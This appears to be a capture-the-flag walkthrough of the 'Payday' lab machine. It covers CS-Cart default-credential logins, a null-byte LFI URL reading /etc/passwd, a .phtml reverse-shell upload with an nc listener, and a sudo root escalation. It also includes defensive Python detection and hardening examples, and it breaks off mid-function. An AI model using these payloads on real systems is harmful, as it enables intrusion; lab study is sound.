
PG - Payday

Gained initial access by exploiting an insecure file upload with an extension bypass. Used weak credentials to move laterally to another user account, then escalated privileges by abusing insecure sudo permissions found with sudo -l.

Recon

nmap finds a number of open ports:

nmap -Pn -sS -sC -sV -T4 -vvv -p- $TARGET

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
| ssh-dss [key omitted]
|   2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RMCw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw==
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open  pop3        syn-ack ttl 61 Dovecot pop3d
|_pop3-capabilities: CAPA STLS TOP SASL PIPELINING RESP-CODES UIDL
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        syn-ack ttl 61 Dovecot imapd
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
|_imap-capabilities: MULTIAPPEND completed UNSELECT Capability STARTTLS OK NAMESPACE LOGIN-REFERRALS LOGINDISABLEDA0001 CHILDREN IDLE LITERAL+ THREAD=REFERENCES IMAP4rev1 SORT SASL-IR
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    syn-ack ttl 61 Dovecot imapd
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-03-25T02:19:35+00:00; +7s from scanner time.
|_imap-capabilities: MULTIAPPEND UNSELECT completed Capability NAMESPACE AUTH=PLAINA0001 LOGIN-REFERRALS OK CHILDREN IDLE LITERAL+ THREAD=REFERENCES IMAP4rev1 SORT SASL-IR
995/tcp open  ssl/pop3    syn-ack ttl 61 Dovecot pop3d
|_ssl-date: 2025-03-25T02:19:36+00:00; +8s from scanner time.
|_pop3-capabilities: CAPA SASL(PLAIN) TOP USER PIPELINING RESP-CODES UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC
| WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET
| MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m
| ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly
| czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1
| MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT
| yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf
| TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K
| eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6
| +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1
| gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS
| tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0=
|_-----END CERTIFICATE-----
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 40m07s, deviation: 1h37m59s, median: 7s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 38412/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 41194/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26461/udp): CLEAN (Failed to receive data)
|   Check 4 (port 11981/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name:
|   Domain name:
|   FQDN: payday
|_  System time: 2025-03-24T22:19:32-04:00

Based on the scan results, I can confirm that I am attacking a Linux machine.

A null session works on SMB, but there are no available shares to go on.

HTTP port 80 shows that it is running CS-Cart shopping cart software.

[Image: CS-Cart homepage]

I’ll poke around to learn its features.

Using admin:admin, I managed to log in to the portal. It is good practice to do a default-credential password spray whenever there is a login form.

It did not give me much to go on. I'll proceed with directory fuzzing to look for any hidden directories.

ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.140.39/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/combined_directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 54ms]
include                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 48ms]
catalog                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 50ms]
install                 [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 72ms]
config                  [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 47ms]
classes                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 49ms]
var                     [Status: 301, Size: 332, Words: 21, Lines: 10, Duration: 49ms]
skins                   [Status: 301, Size: 334, Words: 21, Lines: 10, Duration: 48ms]
core                    [Status: 301, Size: 333, Words: 21, Lines: 10, Duration: 47ms]
image                   [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 68ms]
index                   [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 77ms]
admin                   [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 1247ms]
payments                [Status: 301, Size: 337, Words: 21, Lines: 10, Duration: 47ms]
addons                  [Status: 301, Size: 335, Words: 21, Lines: 10, Duration: 46ms]
chart                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 88ms]
shippings               [Status: 301, Size: 338, Words: 21, Lines: 10, Duration: 49ms]
init                    [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 48ms]
server-status           [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 51ms]
apache2-default         [Status: 301, Size: 344, Words: 21, Lines: 10, Duration: 45ms]
targets                 [Status: 301, Size: 336, Words: 21, Lines: 10, Duration: 47ms]
prepare                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 46ms]
...[snip]...

One directory that stands out is /admin.

Visiting the URL got me to the admin login page.

[Image: hidden admin login page]

I sprayed default credentials and managed to log in with admin:admin.

[Image: admin control panel]

Now I have more access in the platform. I'll poke around the web app for any vectors.

There is an upload function in template_editor. There might be an insecure file upload vulnerability where I can try to bypass the extension check, but for now I'll note this down and come back to it later.

[Image: possible vector via file upload]

There is phpinfo in /admin.php?target=tools&mode=phpinfo. It gives me a peek into the server hosting this web app.

Usually there are a few things worth checking in phpinfo:

  1. Environment variables like ALLUSERSPROFILE for any possible usernames
  2. upload_tmp_dir to see which directory uploaded files are written to
  3. allow_url_fopen to see if it is on, which might lead to RFI

I only found that allow_url_fopen is set to On, which might allow RFI.

I am unable to find the app version anywhere besides the copyright at the bottom, so I'll use the year to search for possible vulnerabilities.

[Image: exploit search results]

The first few results indicate that version 1.3.3 has multiple vulnerabilities, including authenticated RCE and RFI, and that might be the version my target is running.

The RCE exploit shows that the vulnerability is in the file manager, which I'm assuming is the template_editor.

Another exploit shows an LFI in class.cs_phpmailer.php.

Exploitation

I’ll test RFI first.

After a lot of trial and error, adding a null byte (%00) works and I got the LFI.

http://192.168.140.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

[Image: LFI on class.cs_phpmailer]

There is a user patrick on the server. I tried to enumerate for a private SSH key, to no avail.
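The null-byte truncation behind this LFI, and the resolver check that defeats it, as an added Python example (not code from the write-up or from CS-Cart). The include pattern (a user-controlled classes_dir prefixed to a fixed file name) and the directory layout are assumptions modelled on the URL above; the flag_request helper at the end is the detection side of the same two tricks, for use over web server access logs.

```python
from __future__ import annotations

import posixpath
import re
from urllib.parse import unquote

# Assumed shape of the vulnerable script: a user-controlled directory is
# prefixed to a fixed file name before include(). Both paths are assumptions,
# not taken from CS-Cart source.
CLASSES_DIR = "/var/www/classes"
FIXED_SUFFIX = "/class.phpmailer.php"


def c_string(s: str) -> str:
    """Mimic a C string: everything after the first NUL byte is dropped.
    PHP before 5.3.4 handed include() paths to the C runtime this way, which
    is why a %00 in the parameter cut off whatever the script appended."""
    nul = s.find("\x00")
    return s if nul < 0 else s[:nul]


def vulnerable_include_path(classes_dir_param: str) -> str:
    """Path the legacy pattern ends up opening: decoded parameter plus the
    fixed suffix, truncated at the first NUL as the C runtime would."""
    return c_string(unquote(classes_dir_param) + FIXED_SUFFIX)


def safe_include_path(classes_dir_param: str, base: str = CLASSES_DIR) -> str | None:
    """Hardened resolver: refuse NUL bytes, normalise the path and require the
    result to stay inside `base`. Returns None when the request is refused."""
    value = unquote(classes_dir_param)
    if "\x00" in value:
        return None
    candidate = posixpath.normpath(posixpath.join(base, value.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        return None  # traversal escaped the allowed directory
    return candidate + FIXED_SUFFIX


# Detection side: both tricks are easy to spot in the web server's access log.
_TRAVERSAL = re.compile(r"(\.\./|\.\.%2f|%2e%2e)", re.IGNORECASE)


def flag_request(url: str) -> list[str]:
    """Return the reasons a request URL looks like an LFI attempt (empty list
    for a clean request)."""
    reasons = []
    if "%00" in url.lower() or "\x00" in url:
        reasons.append("null byte")
    if _TRAVERSAL.search(url):
        reasons.append("directory traversal")
    return reasons


if __name__ == "__main__":
    payload = "../../../../../../../../../../../etc/passwd%00"
    print("legacy include opens:", vulnerable_include_path(payload))
    print("hardened resolver returns:", safe_include_path(payload))
    print("flags:", flag_request("/classes/phpmailer/class.cs_phpmailer.php?classes_dir=" + payload))
```

Without the null byte the legacy code would try to open ../../etc/passwd/class.phpmailer.php and fail, which is why the trial and error above only succeeded once %00 was appended; the hardened resolver refuses NUL bytes outright and uses commonpath rather than a string prefix, so a sibling directory such as classes2 cannot pass the check either.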

Shell as www-data

I'll try to go for the authenticated RCE next. The exploit's explanation lacks some details, but I found better instructions for exploiting it, referenced in this gist:

  1. Visit “cs-cart” /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section)
  2. Under Look and Feel section click on “template editor”
  3. And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload
  4. If successful, you should be able to get RCE
  5. For example, grab this file and rename it to whoami.phtml
  6. Now, visit http://[victim]/skins/whoami.phtml
  7. And you should see www-data or apache etc as the output

I'll use the Ivan Sincek PHP reverse shell from revshells, as I find it very reliable compared to the pentestmonkey version.

Before I upload the reverse shell, I'll start a listener to catch it, using penelope (or a plain netcat listener):

python3 penelope.py

rlwrap nc -nvlp 4444

[Image: upload reverse shell payload]

Accessing http://192.168.140.39/skins/shell.phtml after the shell has been uploaded, I got a shell as www-data.

[Image: reverse shell connection]
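A side-by-side of the denylist check that .phtml slips past and an allowlist check that closes the gap, plus a log scan that spots script files being requested from a template directory. This is an added Python example written for this page, not CS-Cart's code: the handler extension set, the template allowlist and the /skins/ upload directory are assumptions, and the access-log lines are constructed.

```python
from __future__ import annotations

import re
import secrets

# Extensions the PHP handler is typically mapped to. On Debian/Ubuntu the
# stock Apache PHP module configuration also matches .phtml and .php3, which is
# why a denylist on ".php" alone is not enough. The set is an assumption about
# a typical server, not taken from the Payday box.
PHP_HANDLER_EXTS = {"php", "phtml", "php3", "php4", "php5", "phar", "phps", "pht"}

# Extensions a template editor legitimately needs (assumed allowlist).
TEMPLATE_EXTS = frozenset({"tpl", "css", "js", "html", "txt"})


def vulnerable_check(filename: str) -> bool:
    """Shape of the weak check the write-up bypasses: a denylist that only
    looks for a literal .php suffix, so shell.phtml is accepted."""
    return not filename.lower().endswith(".php")


def hardened_check(filename: str, allowed: frozenset[str] = TEMPLATE_EXTS) -> bool:
    """Allowlist every extension in the chain and reject anything that could
    alter the path or hide an extension (NUL bytes, separators, empty parts)."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) < 2 or any(not p for p in parts):
        return False
    # Checking the whole chain also blocks shell.php.tpl on servers whose
    # handler matching is not anchored to the final extension.
    return all(p.lower() in allowed for p in parts[1:])


def stored_name(filename: str) -> str | None:
    """Name to save the file under: a random stem plus the validated
    extension, so the uploader never chooses the path on disk."""
    if not hardened_check(filename):
        return None
    return f"{secrets.token_hex(8)}.{filename.rsplit('.', 1)[1].lower()}"


# Detection: requests for script files inside a directory that should only
# serve templates and static assets are a strong signal an upload was executed.
_LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def executed_uploads(log_lines, upload_dirs=("/skins/",)) -> list[str]:
    """Return request paths that hit PHP-handled files under an upload dir."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.search(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        if ext in PHP_HANDLER_EXTS and any(path.startswith(d) for d in upload_dirs):
            hits.append(path)
    return hits


# Constructed sample access-log lines (not from the Payday box).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Mar/2025:22:30:01 -0400] "GET /skins/basic/customer/styles.css HTTP/1.1" 200 812',
    '10.0.0.5 - - [24/Mar/2025:22:31:12 -0400] "GET /skins/shell.phtml HTTP/1.1" 200 0',
    '10.0.0.5 - - [24/Mar/2025:22:31:40 -0400] "GET /index.php?dispatch=products.view HTTP/1.1" 200 28074',
]

if __name__ == "__main__":
    for name in ("shell.phtml", "shell.php.tpl", "theme.tpl"):
        print(f"{name:14} denylist={vulnerable_check(name)!s:5} allowlist={hardened_check(name)}")
    print("script hits under /skins/:", executed_uploads(SAMPLE_LOG))
```

The allowlist alone is not the whole fix: the upload directory should also be served with script execution disabled (for Apache, a php_admin_flag engine off or a handler reset for that directory), so that even a file that gets past the check is returned as static content rather than run.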

Shell as patrick

I'll try to move laterally to the user patrick, as I did not find any privilege escalation vector.

Since I got into the admin portal earlier with default credentials, I tested patrick:patrick and managed to get an SSH session.

ssh patrick@192.168.140.39

[Image: SSH session as patrick]

Shell as root

Running sudo -l reveals that I can run any command with sudo, meaning I have root access to the machine.

...[snip]...
User patrick may run the following commands on this host:
    (ALL) ALL
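An audit helper for exactly this finding, added here as a Python example rather than taken from the write-up: it parses sudoers-style user specifications and the entry lines of sudo -l output, then flags rules that grant unrestricted or passwordless root. The parser covers only plain user specifications (no aliases or includes), and the sample inputs are constructed; the sudo -l sample mirrors the output format above.

```python
from __future__ import annotations

import re

# Sudoers user specification:  who  host = (runas_user[:runas_group]) [TAG:] cmd, cmd
_SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
# Entry line of `sudo -l` output:  (runas) [TAG:] cmd, cmd
_SUDO_L_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
_TAGS = ("NOPASSWD:", "PASSWD:", "NOEXEC:", "EXEC:", "SETENV:", "NOSETENV:",
         "LOG_INPUT:", "NOLOG_INPUT:", "LOG_OUTPUT:", "NOLOG_OUTPUT:")
_SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")


def _split_tags(cmds: str) -> tuple[set[str], list[str]]:
    """Peel leading tags (NOPASSWD: etc.) off a command list."""
    tags: set[str] = set()
    changed = True
    while changed:
        changed = False
        for tag in _TAGS:
            if cmds.startswith(tag):
                tags.add(tag.rstrip(":"))
                cmds = cmds[len(tag):].strip()
                changed = True
    return tags, [c.strip() for c in cmds.split(",") if c.strip()]


def parse_sudoers(text: str) -> list[dict]:
    """One record per plain user specification; aliases, Defaults and
    #include lines are skipped."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _SPEC_RE.match(line)
        if not m:
            continue
        tags, commands = _split_tags(m.group("cmds").strip())
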